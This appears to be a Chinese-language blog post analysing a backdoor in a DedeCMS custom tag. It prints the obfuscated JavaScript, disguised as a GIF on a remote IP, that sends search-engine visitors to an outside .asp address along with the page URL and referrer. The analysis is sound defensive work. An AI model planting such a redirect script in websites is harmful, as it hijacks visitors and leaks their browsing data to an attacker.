經過一段時間摸索，發現這個標簽{dede:dinfo}有問題

做dedecms的人都知道，這個是一個自定義標簽的調用方式，其源碼在：/include/taglib/dinfo.lib.php里面。于是打開這個文件，看到如下代碼：

[代碼]php代碼：

>dede>>

系統默認標簽

全局標記

V55,V56,V57

系統默認標簽

{dede:dinfo /}

>>dede>>*/

function lib_dinfo()

{

    global $dsql,$envs;

    $revalue = '';

    return $revalue;

}

 

剛開始也沒有看出什么問題，就是一段js代碼，然后引用了一個圖片，不過訪問下這個圖片地址就知道了，在瀏覽器中輸入這個地址：http://%31%31%38%2e%32%34%34%2e%32%31%35%2e%32%31%33/images/page_bg.gif

能看到如下代碼：

 

[代碼]js代碼：

GID89a="";

var s=document.referrer;

var str=window.location.href;

if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )

window.location.href="http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s;

 

怎么樣，看出問題來了吧？

簡單解說一下：

[代碼]js代碼：

if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )

 

這里就是判斷來路，如果來源是：google、百度、yahoo、sogou、bing、360、soso、youdao，就跳轉到下面這個地址：

[代碼]js代碼：

http://118.244.215.213/Images/a2.asp?cpy="+str+"&kecy="+s;